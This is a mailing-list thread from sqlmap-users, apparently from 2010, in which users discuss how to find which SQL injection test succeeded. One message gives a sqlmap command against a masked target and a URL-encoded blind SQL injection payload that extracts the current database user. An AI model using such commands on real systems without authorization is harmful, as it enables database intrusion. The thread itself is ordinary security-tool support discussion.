Which >get was the right >> > > >HI Beatriz > >When you run sqlmap against a target and one of the tests succeeds, sqlmap tells yo... >2010/1/20 Duran, Beatriz > >>Hi, after you ran sqlmap to get for example, the list of tables; it gives you the query applied but... > > >------------------------------------------------------------------------------ >Throughout its 18-yea... > > >> > > > > > > > > > > > > KPMG esta comprometido con la responsabilidad ambiental. > > > > Por ... > >------------------------------------------------------------------------------ >>Throughout its 18-year history, RSA Conference consistently attracts the >>world's best and brightest in the field, creating opportunities for Conference >>attendees to learn about information security's most important issues through >>interactions with peers, luminaries and emerging and established companies. >http://p.sf.net/sfu/rsaconf-dev2dev >_______________________________________________ >>sqlmap-users mailing list >sql...@li... >https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
|
From: Beatriz D. <bea...@ya...> - 2010-01-21 06:36:52
|
For example, you run: sqlmap -u http://XXX.XXX.XXX.XXX/something/?departamento=0 -v 5 --sql-query "SELECT CURRENT_USER()" After the execution you find the current user: [00:11:15] [INFO] retrieved: usqli@localhost [00:11:15] [DEBUG] performed 112 queries in 87 seconds SELECT CURRENT_USER(): 'usqli@localhost' But the results say that 112 queries were tried, like: something/?departamento=0%20AND%20ORD%28MID%28%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%2810000%29%29%2C%20CHAR%2832%29%29%29%2C%2016%2C%201%29%29%20%3E%201%20AND%20316=316 HTTP/1.1 How can I know which one of the 112 got the result? ________________________________ From:Ignacio Hernández [mailto:nac...@gm...] Sent: Miércoles, 20 de Enero de 2010 06:10 p.m. To: Duran, Beatriz Subject: Re: [sqlmap-users] Which get was the right HI Beatriz When you run sqlmap against a target and one of the tests succeeds, sqlmap tells you that. It tells you the quotes (single or doubles) and the nomber of parenthesis needed to inject sql code. On lasts versions of sqlmap it does the tests just one time and stores the data to a file telling you where this file is each time you start sqlmap against the same target, for example: [00:59:06] [INFO] using '/home/nacho/sqlmap/output/www.target.com/session' as session file You can open that file and see there what test worked. Sorry about my english im spanish :) 2010/1/20 Duran, Beatriz Hi, after you ran sqlmap to get for example, the list of tables; it gives you the query applied but how could you know which test was the one that worked? Thanks, ------------------------------------------------------------------------------ Throughout its 18-year history, RSA Conference consistently attracts the world's best and brightest in the field, creating opportunities for Conference attendees to learn about information security's most important issues through interactions with peers, luminaries and emerging and established companies. http://p.sf.net/sfu/rsaconf-dev2dev _______________________________________________ sqlmap-users mailing list sql...@li... https://lists.sourceforge.net/lists/listinfo/sqlmap-users KPMG esta comprometido con la responsabilidad ambiental. Por favor, considere el medio ambiente antes de imprimir este e-mail. The information in this e-mail is confidential and may be legally privileged. It is intended solely for the addressee. If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful. KPMG cannot guarantee that e-mail communications are secure or error-free, as information could be intercepted, corrupted, amended, lost, destroyed, arrive late or incomplete, or contain viruses. The opinions or professional criteria provided by our Firm are issued formally through a document drafted in the Firm's letterhead and signed by the partner or director responsible for the service; consequently, the contents and/or documentation relating to this communication may include opinions, recommendations or other information that should not be used as basis or grounds for influencing any decisions. Furthermore, there can be no guarantee that the information contained in this e-mail is accurate as of the date it is received or that it will continue to be accurate in the future. In this sense, the Firm assumes no responsibility, civil or otherwise for information included herein or for any potential errors or inaccuracies this document may contain. KPMG Cardenas Dosal, S .C. is a Mexican partnership and the Mexican member firm of the KPMG network of independent firms affiliated with KPMG International Cooperative (KPMG International), a Swiss entity. KPMG International Cooperative (KPMG International) is a Swiss entity. Member firms of the KPMG network of independent firms are affiliated with KPMG International. KPMG International provides no client services. No member firm has any authority to obligate or bind KPMG International Cooperative or any other member firm vis-à-vis third parties, nor does KPMG International Cooperative have any such authority to obligate or bind any member firm in any manner whatsoever. Each member firm is a legally distinct and separate entity. |
|
From: Duran, B. <bea...@kp...> - 2010-01-20 23:03:49
|
Hi, after you ran sqlmap to get for example, the list of tables; it gives you the query applied but how could you know which test was the one that worked? Thanks, <table class="MsoNormalTable" border="0" cellspacing="0" cellpadding="0" style="width: 681px"> <tr> <td width="43" valign="top" style="width:32.25pt;padding:0in 0in 0in 0in"> <p class="MsoNormal" style="margin-top:7.5pt;margin-right:0in;margin-bottom: 22.5pt;margin-left:0in;line-height:16.8pt"> <span style="font-size: 7.0pt; font-family: Arial,sans-serif; color: #89C326"> <img border="0" src="http://www.kpmg.com.mx/images/livinggreen.gif" width="37" height="54"></span></td> <td valign="bottom" style="width:607px;padding-left:0in; padding-right:24.0pt; padding-top:.1in; padding-bottom:0in"> <p class="MsoNormal" style="margin-top:7.5pt;margin-right:0in;margin-bottom: 22.5pt;margin-left:0in;line-height:16.8pt"> <span style="font-size: 7.0pt; font-family: Arial,sans-serif; color: #89C326"> KPMG esta comprometido con la responsabilidad ambiental.</span><span style="font-size:7.0pt; font-family:"Arial","sans-serif";color:#89C326"><br> </span> <span style="font-size: 7.0pt; font-family: Arial,sans-serif; color: #89C326"> Por favor, considere el medio ambiente antes de imprimir este e-mail.</span></td> </tr> <tr> <td valign="top" style="width:681px;padding:0in; " colspan="2"> <p align="justify"> <span style="font-size: 7.0pt; font-family: Arial,sans-serif; color: #000080"> The information in this e-mail is confidential and may be legally privileged. It is intended solely for the addressee. If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful. <br> <br> KPMG cannot guarantee that e-mail communications are secure or error-free, as information could be intercepted, corrupted, amended, lost, destroyed, arrive late or incomplete, or contain viruses.</span></p> <p align="justify"> <span style="font-size: 7.0pt; font-family: Arial,sans-serif; color: #000080"> The opinions or professional criteria provided by our Firm are issued formally through a document drafted in the Firm's letterhead and signed by the partner or director responsible for the service; consequently, the contents and/or documentation relating to this communication may include opinions, recommendations or other information that should not be used as basis or grounds for influencing any decisions. Furthermore, there can be no guarantee that the information contained in this e-mail is accurate as of the date it is received or that it will continue to be accurate in the future. In this sense, the Firm assumes no responsibility, civil or otherwise for information included herein or for any potential errors or inaccuracies this document may contain.</span></p> <p align="justify"> <span style="font-size: 7.0pt; font-family: Arial,sans-serif; color: #000080"> KPMG Cardenas Dosal, S .C. is a Mexican partnership and the Mexican member firm of the KPMG network of independent firms affiliated with KPMG International Cooperative (KPMG International), a Swiss entity. KPMG International Cooperative (KPMG International) is a Swiss entity. Member firms of the KPMG network of independent firms are affiliated with KPMG International. KPMG International provides no client services. No member firm has any authority to obligate or bind KPMG International Cooperative or any other member firm vis-à-vis third parties, nor does KPMG International Cooperative have any such authority to obligate or bind any member firm in any manner whatsoever. Each member firm is a legally distinct and separate entity.</span></td> </tr> </table> <p align="justify"> </p> |
48 messages has been excluded from this view by a project administrator.
![http://www.kpmg.com.mx/images/livinggreen.gif"](http://www.kpmg.com.mx/images/livinggreen.gif"){kind=link}